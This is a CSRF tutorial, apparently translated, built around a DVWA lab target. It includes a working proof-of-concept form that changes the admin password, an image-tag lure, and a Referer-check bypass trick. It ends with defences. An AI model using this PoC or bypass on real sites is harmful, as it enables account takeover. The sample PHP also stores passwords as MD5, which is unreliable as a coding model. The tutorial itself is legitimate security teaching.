Solemnly declare:
This note is only prepared for the purpose of improving safety knowledge and sharing safety knowledge with more people. Do not use the technology in the note for illegal activities. The consequences caused by using the technology in the note have nothing to do with the author himself. It is everyone's responsibility to maintain network security and jointly maintain network civilization and harmony.
1 Introduction
CSRF definition: Cross Site Request Forgery (English: Cross Site Request Forgery), also known as one click attack or session riding, usually abbreviated as CSRF, is an attack method that coerces users to perform unintentional operations on currently logged in Web applications.
Users who have been authenticated can normally access server resources. At this time, if the hacker sends a link, it is a service resource for the above access, such as a link request to modify the password. At this time, the user clicks, it will be executed, and the password will be directly modified, because it is submitted by using the authenticated legal identity.
1.1 difference between CSRF and XSS
From the perspective of trust:
XSS: using the user's trust in the site, the script issued by the server is executed in the client browser
CSRF: use the site's trust in identity authentication
1.2 hazards of CSRF
Submit the request involuntarily and unknowingly
- Modify account password and personal information (modify registered email and receiving address)
- Send forged business requests (online banking, shopping, voting)
- Pay attention to other people's social accounts and push blog posts
1.3 causes of CSRF
Lack of secondary confirmation mechanism:
- Generally speaking, for the server, all requests are legal because the user has been verified. However, for key operations on the server side, the lack of confirmation mechanism is the root cause of this problem (verification code mechanism can be used)
1.4 vulnerability utilization conditions
- The murdered user has completed identity authentication
- The submission of new requests does not require re authentication or confirmation mechanisms
- The attacker must understand the parameter construction of the web app request
- Instructions to induce users to trigger attacks (social workers)
2 verify CSRF
2.1 verification environment
Target: meatsploitabile2, dvwa, security level: low, CSRF
WEB server host: ensure that the target can access the CSRF WEB page
<?php
if (isset($_GET['Change'])) {
// Turn requests into variables
$pass_new = $_GET['password_new'];
$pass_conf = $_GET['password_conf'];
if (($pass_new == $pass_conf)){
$pass_new = mysql_real_escape_string($pass_new);
$pass_new = md5($pass_new);
$insert="UPDATE `users` SET password = '$pass_new' WHERE user = 'admin';";
$result=mysql_query($insert) or die('<pre>' . mysql_error() . '</pre>' );
echo "<pre> Password Changed </pre>";
mysql_close();
}
else{
echo "<pre> Passwords did not match. </pre>";
}
}
?>
2.2 build inducement to click on the web page
By registering the users of the target website, analyze the parameter structure of their web app request, and build a web page to induce the victims to click
csrf.html
<html>
<!-- CSRF PoC -->
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://192.168.100.129/dvwa/vulnerabilities/csrf/">
<input type="hidden" name="password_new" value="password1" />
<input type="hidden" name="password_conf" value="password1" />
<input type="hidden" name="Change" value="Change" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
2.3 entice victims to click
Entice the victim to click on the above constructed Web page through social workers or other means (when the victim has logged in to this website)
<img src=http://web server IP/csrf.html />
Click to complete the modification of the account password.
3 Medium level
<?php
if (isset($_GET['Change'])) {
// Checks the http referer header
if ( eregi ( "127.0.0.1", $_SERVER['HTTP_REFERER'] ) ){
// Turn requests into variables
$pass_new = $_GET['password_new'];
$pass_conf = $_GET['password_conf'];
if ($pass_new == $pass_conf){
$pass_new = mysql_real_escape_string($pass_new);
$pass_new = md5($pass_new);
$insert="UPDATE `users` SET password = '$pass_new' WHERE user = 'admin';";
$result=mysql_query($insert) or die('<pre>' . mysql_error() . '</pre>' );
echo "<pre> Password Changed </pre>";
mysql_close();
}
else{
echo "<pre> Passwords did not match. </pre>";
}
}
}
?>
Check the above source code and add the judge referer information to see whether the request contains 127.0.0.1, that is, the password can only be modified locally. If not, it cannot be executed.
You can try to modify the request packet to refer: http://web Server IP / 127.0.0.1 to bypass
4 defense strategy
On CSRF - Jianshu (jianshu.com)
- Validate HTTP Referer fields
- Add a token to the request address and verify it
- Customize the attribute in the HTTP header and validate it
- Page plus verification code judgment